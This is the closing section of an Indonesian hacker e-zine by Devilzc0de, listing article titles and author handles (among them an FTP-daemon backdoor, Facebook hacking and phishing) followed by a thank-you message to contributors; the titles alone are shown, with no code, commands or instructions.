- Menyisipkan Backdoor ke Source Code Daemon pure-ftpd-1.0.29
White_Heaven_Angels aka CyberMuttaqin
- Hacking Finger Print
Matmut
- Hack Facebook
Green Coded
- Model View Controller
Cakill Schumbag
- Routing Simulasi Ip Dengan Paket Tracer Beserta Pembelajaran Ip Addr
Kahfiehudson
- Nonton Video di Youtube Pake HTML5
Badwolves1986
- Phishing Tutorial
Hal 73
c0de reborn
Penutup
Saat ini segalanya yang dihasilkan para penulis benar-benar luar biasa, mereka memberikan kepada kita segalanya.
Dan mereka juga melakukannya dari hati dan dengan keikhlasan, Anda dapat melihat dan merasakan bagaimana
mereka begitu bergembira dengan semua yang dilakukan dan sumbangkan untuk terbitnya E-Zine. Ini bukan hanya
sebuah bahan bacaan biasa, ini adalah bagian dari jiwa mereka, bagian dari yang mereka berikan kepada kita,
sebagai sumber pengetahuan, dan amal...
Akhir kata kami segenap Staff Pengurus Devilzc0de mengucapkan banyak terima kasih yang sebesar besarnya
kepada pihak pihak yang mendukung dan membantu terlaksananya hingga terbitnya E-Zine ini...
Semoga semangat kita semua untuk bersatu dan membangun bisa terjalin dengan baik...
Kritik dan saran silahkan anda kirimkan ke
Email : [email protected]
Salam
Devilzc0de
Hal 74